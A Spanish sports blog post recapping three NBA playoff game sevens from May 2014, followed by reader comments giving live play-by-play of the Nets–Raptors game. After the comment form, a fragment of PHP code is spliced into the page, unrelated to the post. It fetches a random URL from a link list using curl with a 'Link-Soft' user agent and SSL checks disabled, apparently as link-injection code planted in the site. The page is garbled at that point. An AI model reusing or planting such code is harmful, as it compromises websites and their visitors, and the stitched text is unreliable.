La crónica: Win or go home

04 de May de 2014 por TheDeerHunter

En un primera ronda plagada de incertidumbres por fin podíamos experimentar la seguridad de un hecho. Anoche terminarían sí o sí 3 series en un acto de apoteósica épica. Lo nunca visto. Es una lástima que esto acabe, pero debe ser así. Quedan nuevas y apasionantes batallas en el horizonte.

Comenzamos por el Hawks@Pacers. No sabemos qué es lo que pudo ser más alucinante. Si la resurrección cual Lázaro de Roy Hibbert o el inoperante comienzo de Paul Millsap. Nunca se sabe cómo puede afectar el peso de un partido a vida o muerte. Los Hawks lograron aguantar durante el primer cuarto, pero en el segundo el colapso fue absoluto, con casi 6 minutos sin anotar en juego. Paul George olió sangre y aprovechó para coserlos a contragolpes, abriendo brecha. La primera parte se cerraba con uno de los tapones del año de Mahinmi a Jeff Teague. Los abucheos del quinto se volvían euforia e incluso entre los jugadores locales volvían a verse gestos de camaradería y complicidad. En la reanudación los Pacers se limitaron a controlar las embestidas de Millsap y compañía, muy favorecidos por la obsesión de los hawks por el triple con importante desacierto. Vogel salva la cabeza momentáneamente y pasa ronda, pero sólo hemos llegado a ver lejanas reminiscencias de los mejores Pacers de este curso.

Después, con la sanción a Z-Bo por el puñetazo a Adams, los problemas físicos de Conley y la dudosa presencia de Tony Allen los Grizzlies acudían a la cita decisiva como corderos al matadero. Sin embargo, un agresivo Marc lideraba la tormenta de 36 puntos que inflinjían para abrir boca. Nada que no se pueda arreglar con la habitual ensalada de tiros libres locales, junto a un Durant impecable desde el triple. Además Westbrook firmaba su segundo triple doble en un séptimo partido de playoffs y su récord de asistencias personal en postemporada. Butler y Jackson ayudaban y entre el segundo y tercer cuarto la anotación de los Thunder ascendió a 67 puntos, cifra insostenible para Grizzlies. Los favoritos se imponían y Dereck Fisher alcanza a Robert Horry como los jugadores con mayor número de victorias en postemporada.

Para el final lo mejor. Menudo espectáculo nos brindaron Clippers y Warriors, en presencia de la señora de Sterling, por cierto. Se suponía que CP3 era duda hasta el último momento aunque pocos nos tomamos su hipotética ausencia demasiado en serio. El comienzo de los Warriors fue letal, con ese trance triplista que en ocasiones les da y que es virtualmente incontrolable. Curry en su salsa y Draymond Green como ejecutor inesperado para alcanzar un parcial inicial de 32 a 22. A partir del segundo cuarto los Clippers entraron de lleno en el intercambio de golpes, gracias a la excelente dirección de Paul. Lograrían dar la vuelta a la tortilla en el tercero, con Jamal Crawford firmando sus mejores minutos y sujetando a los Warriors por primera vez y única en el partido.
Si no teníamos bastante el último cuarto volvió a ser para enmarcar. 76 puntos entre ambos. Fue increíble la sangre fría de los Clippers para mantener su juego de alley-hoops en situación de máxima tensión. Al escandaloso nivel que impusieron lograron responder los Warriors, otra vez, con triples de Iggy y Green. Ojo a los instantes finales que protagonizaron Griffin y DeAndre y que a la postre terminaron inclinando la eliminatoria. Doc Rivers terminó celebrando la victoria como si hubiera sido un anillo. Un auténtico renacimiento. Si todo lo que les ha rodeado no los ha matado, le ha hecho más fuertes.

MVP: Russell Westbrook se convierte en el único jugador junto a Rondo que hayan logrado dos triple dobles en diferentes séptimos partidos de playoffs. Nueva marca personal en 16 asistencias, más sus 27 puntos con 10 de 16 en tiro y 10 rebotes. Además 2 robos y 1 tapón. Ciertamente sí le echaron de menos el año pasado.

La sorpresa: Roy Hibbert ya no estaba invitado a ninguna fiesta. Para empezar volvió a parecerse al muro que en los últimos tiempos ha sido. 5 tapones. Además logró prodigarse a anotar con cierta eficacia. Sólo 13 puntos, pero 6-10 en tiro, añadiendo 7 rebotes. Le van a necesitar como mínimo así para tener opciones de seguir en la brecha.

La decepción: Al mal inicio de Millsap se unieron los catastróficos partidos de Pero Antic y DeMarre Carroll para completar un frontcourt de pesadilla. Mención especial a Harrison Barnes, quién disfrutó de 13 irrelevantes minutos, para concluir un año para olvidar. Igualito que el pasado.

El mayor esfuerzo en vano: Paul Millsap, quien se mató para revertir su pésima primera parte y lo consiguió parcialmente. Marc Gasol en plan Leónidas. Maravillosos Curry y Draymond Green. Las eliminaciones así siempre tienen un punto de injusticia y el máximo de dignidad.

 

Comenta

21 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Espero que los Wizards sean capaces de lograr lo que no han conseguido los Hawks,que vaya manía les estoy cogiendo a los divo-Pacers.

      Citar

  2. Lucho dice:
    #2

    Una pregunta.
    Estoy mirando Nets Raptors, a punto de terminar el tercer cuarto. Y recién aparecio un cartel que decia que los Nets llevaban 23 minutos sin una perdida
    A fin del segundo cuarto, con unos 2 segundos por terminar, Garnett agarro un rebote y lanzó al aro, pero no a tiempo. No se contabiliza eso como perdida?? No es tecnicamente “tener una posesion y no terminarla con un intento a canasta”? La perdida no es eso?

      Citar

  3. Lucho dice:
    #3

    El rebote lo agarró. Si hubiera tirado a tiempo, era un FG mas, acierte o no. Y si no tira no se contabiliza nada?

      Citar

  4. Jose Luis dice:
    #4

    supongo que no se contabiliza nada, la verdad. Pérdida será cuando la posesión va al otro equipo sin tiro mediante: falta en ataque, balón fuera, pasos…

      Citar

  5. Jose Luis dice:
    #5

    buenoooooo era la 6ª de Williams y se la cargan a Garnett que pasaba por allí.

    25 segundos, bola Nets, 2 arriba

      Citar

  6. Jose Luis dice:
    #6

    falta Lowry, 22.5, falla el primero Deron!

      Citar

  7. Jose Luis dice:
    #7

    mete el segundo, 3 arriba Nets, 22.5, time out Raptors!

      Citar

  8. Jose Luis dice:
    #8

    bandeja de Lowry, 16.7, Nets bola y 1 arriba

      Citar

  9. Jose Luis dice:
    #9

    falta sobre Livingston, 13.2, mete el primero…

      Citar

  10. Jose Luis dice:
    #10

    Segundo dentro, 3 arriba Nets, 13.2, bola Raptors

      Citar

  11. Jose Luis dice:
    #11

    canasta Raptors de nuevo, 8.8, bola Nets, 1 arriba

      Citar

  12. Jose Luis dice:
    #12

    No pueden sacar los Nets, otro tiempo muerto

      Citar

  13. Jose Luis dice:
    #13

    la pierden en el saque, bola raptors, 6.2… increíble

      Citar

  14. Jose Luis dice:
    #14

    dos opciones sin conseguir un buen saque… que vergüenza no lograr un buen bloqueo, en fin.

      Citar

  15. Jose Luis dice:
    #15

    supongo que Lowry o De Rozan, pero yo iría con Ross. 1 abajo Raptors

      Citar

  16. Jose Luis dice:
    #16

    the final countdown suena

      Citar

  17. Jose Luis dice:
    #17

    enésima penetración cagada de Lowry, y adiós. Nets a semifinales

      Citar

  18. Lucho dice:
    #18

    Gran defensa de Pierce en el ultimo.
    Se habia equivocado en la pelota anterior, pero que manera de recuperarse. Que grande eres the truth!!
    Que final!
    Gracias jose luis, pensaba que posesion sin tiro al aro era perdida

      Citar

  19. rumbero dice:
    #19

    Jose Luis:
    dos opciones sin conseguir un buen saque… que vergüenza no lograr un buen bloqueo, en fin.

    Mucho hablar de la experiencia de los Nets y tela con el final de partido. Un poco más y se les va la serie si Lowry no hubiera querido tanta gloria.
    A todo esto los Spurs metiendo casi todo lo que tiran. 35-23 en el 1º cuarto. Sobreviven los Mavs

      Citar

  20. rumbero dice:
    #20

    Que 3 minutos de Manudo. Caviar del bueno

      Citar

  21. Alfredo dice:
    #21

    Esperando con cerveza fría y patatas fritas para ver la masterclass Duncan – Aldrige y Parker – Lilliard

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>